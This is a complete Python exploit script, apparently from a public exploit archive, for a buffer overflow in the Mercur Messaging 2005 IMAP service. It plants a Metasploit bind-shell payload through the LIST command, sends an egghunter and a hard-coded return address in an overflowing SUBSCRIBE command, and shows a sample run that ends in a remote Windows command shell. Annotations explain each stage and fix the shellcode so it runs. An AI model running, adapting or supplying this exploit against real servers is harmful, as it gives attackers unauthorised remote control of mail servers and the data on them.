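#!/usr/bin/python
#
# Mercur Messaging 2005 SP3 IMAP service - Egghunter mod
# muts@offensive-security.com
# http://www.offensive-security.com
#
# Original exploit by Winny Thomas
# Thanks Thomas, this code really came in handy !
#
# VMWare seems to alter the stack a bit as the offset
# of the EIP overwrite was a few bytes off (Windows XPsp2).
# You can inject more than 2000 bytes using an IMAP command (I chose LIST),
# and then let the egghunter do the rest of the work.
# The initial injected buffer gets cut off, so you need to double check that.
#
# bt ~ # ./imap.py 192.168.0.75 test test
# * OK MERCUR IMAP4-Server (v5.00.14 Unregistered) for Windows ready at Thu, 22 Mar 2007 00:59:19 +0200
# a001 OK LOGIN completed
# BAD Command unknown
# Shell on port 4444
#
# bt ~ # nc -v 192.168.0.75 4444
# 192.168.0.75: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.0.75] 4444 (krb524) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\WINDOWS\system32>
#
# NOTE(review): this is a Python 2 script -- every "string" below is a byte
# string that goes on the wire unchanged.  The published listing had its
# hex escapes flattened ("x90" instead of "\x90"); they are restored here,
# since a literal three-character "x90" is not a NOP and the egghunter
# bytes would never execute.

import os
import sys
import time
import socket
import struct

# Stage 1: the egghunter.  It is delivered in the SUBSCRIBE overflow and
# walks process memory looking for the 8-byte egg (the 4-byte tag
# 0x57303054 written twice) that the LIST command planted in front of the
# bindshell, then jumps to the byte after the egg.  The tag in `mov eax`
# below must match the egg placed before `bindshell`.
NOP_SLED_BEFORE = 92
NOP_SLED_AFTER = 100

EGGHUNTER = (
    "\x66\x81\xca\xff\x0f"    # or  dx, 0x0fff   ; advance to next page boundary-1
    "\x42"                    # inc edx
    "\x52"                    # push edx
    "\x6a\x02"                # push 2
    "\x58"                    # pop eax
    "\xcd\x2e"                # int 0x2e         ; kernel probes the page for us
    "\x3c\x05"                # cmp al, 5        ; low byte of STATUS_ACCESS_VIOLATION
    "\x5a"                    # pop edx
    "\x74\xef"                # je  <next page>  ; unreadable -> skip the page
    "\xb8\x54\x30\x30\x57"    # mov eax, 0x57303054 ; the egg tag
    "\x8b\xfa"                # mov edi, edx
    "\xaf"                    # scasd            ; first copy of the tag?
    "\x75\xea"                # jne <next byte>
    "\xaf"                    # scasd            ; second copy of the tag?
    "\x75\xe7"                # jne <next byte>
    "\xff\xe7"                # jmp edi          ; into the bindshell
)

# Egghunter in "nop heaven": NOPs on both sides so an imprecise return
# into the buffer (see the VMware note above) still slides into it.
shellcode = "\x90" * NOP_SLED_BEFORE + EGGHUNTER + "\x90" * NOP_SLED_AFTER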
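# Stage 2: egg + bindshell.  Planted with a LIST command *before* the
# overflow so it is already resident when the egghunter runs.  The
# egghunter jumps to the byte right after the 8-byte egg, so the egg must
# immediately precede the payload.
# NOTE(review): hex escapes restored from the flattened listing
# ("x90" -> "\x90"); the byte values themselves are unchanged.
EGG = "\x54\x30\x30\x57" * 2   # tag 0x57303054 twice; must match the egghunter's mov eax

bindshell = "\x90" * 320
bindshell += EGG
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
# NOTE(review): a bind shell listens unauthenticated -- anyone who can
# reach TCP/4444 on the target gets the shell, not just the operator.
bindshell += (
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
    "\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
    "\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
    "\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
    "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
    "\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
    "\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
    "\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
    "\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
    "\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
    "\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
    "\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
    "\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
    "\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
    "\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
    "\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
    "\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
    "\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
    "\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
    "\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
    "\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
    "\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
    "\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
    "\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
    "\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
    "\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
    "\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
    "\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
    "\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
    "\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
    "\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
    "\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
    "\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
    "\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
    "\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
    "\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
    "\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
    "\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
    "\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
    "\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
    "\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a"
)
# Pad the injected command.  0xcc is int3; it sits after the bindshell and
# is never meant to execute, but it will break into a debugger if control
# ever lands here -- handy while verifying the egg offset.
bindshell += "\xcc" * 1000

IMAP_PORT = 143
BIND_PORT = 4444            # LPORT baked into the metasploit payload above
CRLF = "\r\n"               # IMAP commands are CRLF-terminated (RFC 3501)
# 01883A50 FFD3 CALL EBX   MCRFAX.DLL
# NOTE(review): a hard-coded, non-ASLR address in a specific DLL build;
# the header already notes the EIP offset moved under VMware, so re-verify
# both the gadget and the offset in a debugger against the target build.
RET_ADDR = 0x01883A50


def _le32(value):
    """Return `value` packed as 4 little-endian bytes (struct '<L').

    Wrapped so the result is a text `str` that concatenates with the rest
    of the (Python 2, byte-string) payload on either interpreter.
    """
    return "".join(chr(b) for b in bytearray(struct.pack("<L", value)))


def _build_subscribe_payload(egghunter, ret_addr=RET_ADDR):
    """Build the SUBSCRIBE argument that overwrites EIP with `ret_addr`.

    Layout (offsets are the original author's, found empirically):
    `egghunter` (with its NOP padding), 'L', 'YYYY', 'ZZZZ', the packed
    return address, 'L'*27, 'M'*16, then ` "/" ""` so the command still
    parses as SUBSCRIBE with quoted mailbox arguments.

    Args:
        egghunter: stage-1 bytes to place at the start of the buffer.
        ret_addr: address written over the saved EIP (default RET_ADDR).
    Returns:
        The payload string, without the command tag or the CRLF.
    """
    payload = egghunter
    payload += "L" * 1
    payload += "Y" * 4
    payload += "Z" * 4
    payload += _le32(ret_addr)      # CALL EBX gadget chosen by the original author
    payload += "L" * 27
    payload += "M" * 16
    payload += ' "/" ""'
    return payload


def ExploitMercur(target, username, passwd):
    """Log in, plant the egg + bindshell with LIST, then overflow SUBSCRIBE.

    Each server response is printed; the LIST reply is expected to be an
    error (the sample run in the header shows `BAD Command unknown`).
    `Shell on port 4444` is printed unconditionally -- the script never
    verifies that the overflow actually succeeded.

    Args:
        target: IMAP server host or IP.
        username, passwd: a valid mailbox account -- the vulnerable
            commands are only reachable after LOGIN.  IMAP LOGIN on
            port 143 sends these in cleartext.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((target, IMAP_PORT))
        print(sock.recv(1024))

        # sendall() rather than send(): the LIST buffer is >2 KB and a
        # partial send would silently truncate the planted payload.
        sock.sendall("a001 LOGIN " + username + " " + passwd + CRLF)
        print(sock.recv(1024))

        # Stage 2 first, so the egg is resident when the egghunter runs.
        sock.sendall("a001 LIST " + bindshell + CRLF)
        print(sock.recv(1024))

        # Stage 1: the overflow itself.  No reply is read; the process is
        # expected to be executing the egghunter at this point.
        sock.sendall("a001 SUBSCRIBE " + _build_subscribe_payload(shellcode) + CRLF)
    finally:
        sock.close()
    print("Shell on port 4444")


def ConnectRemoteShell(target):
    """Attach to the bind shell with telnet.  Not invoked by `__main__`.

    The command is passed as an argv list (no shell) so that a `target`
    taken from the command line cannot inject shell metacharacters.
    """
    import subprocess
    subprocess.call(["/usr/bin/telnet", target, str(BIND_PORT)])


if __name__ == "__main__":
    try:
        target = sys.argv[1]
        username = sys.argv[2]
        passwd = sys.argv[3]
    except IndexError:
        print("Usage: %s <imap server> <username> <password> " % sys.argv[0])
        sys.exit(-1)
    ExploitMercur(target, username, passwd)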